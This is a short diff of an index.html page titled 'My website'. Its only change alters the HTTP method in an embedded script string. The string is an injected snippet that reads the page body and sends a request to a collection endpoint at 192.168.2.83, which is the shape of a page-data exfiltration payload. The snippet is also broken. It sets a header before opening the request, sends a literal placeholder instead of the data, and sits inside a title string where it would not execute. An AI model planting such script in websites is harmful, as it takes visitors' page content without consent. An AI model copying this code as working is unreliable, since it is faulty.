--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
    	<title>My website</title>
    	<script >
 
-   		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.setRequestHeader('Content-Type', 'application/json'); xhr.open('POST', 'http://192.168.2.83/collect_data?flag=data',true); xhr.send() <//script>";
+   		var script_title="<script> var data=document.body.innerHTML; var xhr = new XMLHttpRequest(); xhr.setRequestHeader('Content-Type', 'application/json'); xhr.open('GET', 'http://192.168.2.83/collect_data?flag=data',true); xhr.send() <//script>";
    		document.title=script_title;
 
    	</script>
